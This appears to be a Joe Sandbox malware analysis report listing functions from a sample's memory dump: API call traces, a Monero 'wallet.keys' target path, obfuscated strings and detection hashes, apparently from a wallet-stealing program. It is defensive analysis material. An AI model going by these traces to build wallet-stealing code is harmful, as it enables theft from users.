                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 18e816a55811d43dfc4665c89392099d0187b97ee3fc53563507c6d4f06cab89
                                • Instruction ID: 42785697010d0b139d3e6f5034a6fef0419a15739b9fb6fb32c90655b80d1211
                                • Opcode Fuzzy Hash: 18e816a55811d43dfc4665c89392099d0187b97ee3fc53563507c6d4f06cab89
                                • Instruction Fuzzy Hash: DBF17E728241289ADF15FB64DC96EEE7378FF54300F8041D9A41A62091EF706B4ACFB1
                                Function 00D8DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DA14B0,00DA0C2A), ref: 00D8DAEB
                                • StrCmpCA.SHLWAPI(?,00DA14B4), ref: 00D8DB33
                                • StrCmpCA.SHLWAPI(?,00DA14B8), ref: 00D8DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00D8DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 11f1f24b96cddbd9bd36b38dda12d6c28091394f4999df41376fcab61b6e3686
                                • Instruction ID: da075d377209da825d3093e45bb582a8b8be69c98a55908e8f1436a99f649473
                                • Opcode Fuzzy Hash: 11f1f24b96cddbd9bd36b38dda12d6c28091394f4999df41376fcab61b6e3686
                                • Instruction Fuzzy Hash: 9E91FE73910118ABCF14FBB4ED569ED737DEF84304F408658A90A96181EE34AB198BF2
                                Function 01146A11 Relevance: 11.7, Strings: 8, Instructions: 1694COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Us$e9o$.*6{$M~}}$QPs$Tqw$k}$q8{
                                • API String ID: 0-2272092212
                                • Opcode ID: 3c679804cfabece03ddfc43286e4a05e74372d1d898f77ad7402592321ae772e
                                • Instruction ID: 1f8fce79b391dfb68cd5f1578005c8797d2d6948d384695ffed24f36b84eefa3
                                • Opcode Fuzzy Hash: 3c679804cfabece03ddfc43286e4a05e74372d1d898f77ad7402592321ae772e
                                • Instruction Fuzzy Hash: F0B208F36082149FE304AE2DEC8567AF7E9EF94720F1A853DEAC5C3744EA3558018697
                                Function 01144F68 Relevance: 11.7, Strings: 8, Instructions: 1669COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .!t/$>N}$GSs}$V'|$jG|/$o*v$z/=_$7=~
                                • API String ID: 0-2346698372
                                • Opcode ID: 150e11e2a1f1ac92cb7ed3d5e0592602e46cdac382a720148caa0a7da0cdf789
                                • Instruction ID: 9ba62a58f383b97f20ec842baaeecc55ddce6f07d6a0e0c6a9072cbc35267038
                                • Opcode Fuzzy Hash: 150e11e2a1f1ac92cb7ed3d5e0592602e46cdac382a720148caa0a7da0cdf789
                                • Instruction Fuzzy Hash: 2AB238F360C2049FE3086E2DEC8567AB7E9EF94720F1A863DE6C5C3744EA3558058697
                                Function 00D97B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00DA05AF), ref: 00D97BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00D97BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D97C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D97C62
                                • LocalFree.KERNEL32(00000000), ref: 00D97D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 12fdac9f3b8b1c37b01ec581a4c5072cb11756dcd18fcaba09ff05df70e08172
                                • Instruction ID: 041b6ee7e4bce4c66485ac309b2513812f702bfc12e134f5e8202d4529a76766
                                • Opcode Fuzzy Hash: 12fdac9f3b8b1c37b01ec581a4c5072cb11756dcd18fcaba09ff05df70e08172
                                • Instruction Fuzzy Hash: B2411872950228ABDB24DB94DC99BEEB7B8FF48700F604199E10962191DB346F85CFB1
                                Function 0114EE37 Relevance: 10.4, Strings: 7, Instructions: 1688COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1o$5}3o$G<$`1s$f$og$qq?n$Fz6
                                • API String ID: 0-1291997573
                                • Opcode ID: 6ff01f6bbc7e0e3ee27f4f6f28443d4f789b7fcc63f64dee63bdfe4ab84b9d56
                                • Instruction ID: 6f6d89635e12730a4f0bd227e1e785e921d10af6a60d270d0454c972896f39b8
                                • Opcode Fuzzy Hash: 6ff01f6bbc7e0e3ee27f4f6f28443d4f789b7fcc63f64dee63bdfe4ab84b9d56
                                • Instruction Fuzzy Hash: 21B219F3A0C2049FE314AE2DEC8567AFBE9EF94320F1A453DEAC5C3744E67558058692
                                Function 0114D3D1 Relevance: 10.3, Strings: 7, Instructions: 1581COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Iw-$@gY$h[]&$t}$)^s$7\$Yc
                                • API String ID: 0-1492173068
                                • Opcode ID: 50db1641fce0acb477a71c40bc2f322a5bcdb22cf413f4c8582c73fbc99c2caa
                                • Instruction ID: ed5b08b5df9103a14154de09ff0c820db120ccb57559db1d4eefa8b0723b63ea
                                • Opcode Fuzzy Hash: 50db1641fce0acb477a71c40bc2f322a5bcdb22cf413f4c8582c73fbc99c2caa
                                • Instruction Fuzzy Hash: 8DA218F360C2049FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E63598058697
                                Function 01148564 Relevance: 10.3, Strings: 7, Instructions: 1520COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +Uo$-4}$9R?$FUwC$a7s{$a7s{$mg]
                                • API String ID: 0-2109487440
                                • Opcode ID: 161edaff18559f33cb3a926af0529a6883f596a16328abd0883a2585a91fda97
                                • Instruction ID: d1dde57f26bdeaa7118fa17a3fc21fdecd03b4edbc5b7a575c740518b20dd023
                                • Opcode Fuzzy Hash: 161edaff18559f33cb3a926af0529a6883f596a16328abd0883a2585a91fda97
                                • Instruction Fuzzy Hash: D3A229F360C2009FE704AE2DEC8567ABBE5EF94320F164A3DE6C4C7744EA3598458697
                                Function 00D8E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00DA0D73), ref: 00D8E4A2
                                • StrCmpCA.SHLWAPI(?,00DA14F8), ref: 00D8E4F2
                                • StrCmpCA.SHLWAPI(?,00DA14FC), ref: 00D8E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: a94b9b31c70e1d0785b1314db47482cb3ad1f46ed0ea32e1f01940a10aa90612
                                • Instruction ID: dcf945ed6d637a4ed12791da83e06bb091927ced2bf60765612929a40ca11763
                                • Opcode Fuzzy Hash: a94b9b31c70e1d0785b1314db47482cb3ad1f46ed0ea32e1f01940a10aa90612
                                • Instruction Fuzzy Hash: 5812EA72910128AADF18FB68DD96EED7379EF54300F4045A9B50A96091EE306F49CFF2
                                Function 0113CA61 Relevance: 9.1, Strings: 6, Instructions: 1612COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +I~$,<{{$D8Wo$ffU_$wo$xC
                                • API String ID: 0-1548725151
                                • Opcode ID: e9b61f4a1a4300356467bdb17de129b23d92cf661562db0c03cf2ab5bc0de7f4
                                • Instruction ID: e346b485643e5405596b0cae60da35b2312a15f02fad133d343fb4e9c5643fa0
                                • Opcode Fuzzy Hash: e9b61f4a1a4300356467bdb17de129b23d92cf661562db0c03cf2ab5bc0de7f4
                                • Instruction Fuzzy Hash: 80B2D6B360C200AFE3046E2DEC8567ABBE9EFD4720F1A493DEAC5C7744E63558058697
                                Function 01143442 Relevance: 9.1, Strings: 6, Instructions: 1595COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'lv$V>kg$a*+$a1s!$wH~{$"f>
                                • API String ID: 0-393504497
                                • Opcode ID: 816fc23a1eb80431c4c7e8700a0b50150845a4fcdee139b31baef633997ba5b3
                                • Instruction ID: 1f82b8ffb535f7d1ed50ebb38bdd5f776269482698511456f9cb67554b8b20f9
                                • Opcode Fuzzy Hash: 816fc23a1eb80431c4c7e8700a0b50150845a4fcdee139b31baef633997ba5b3
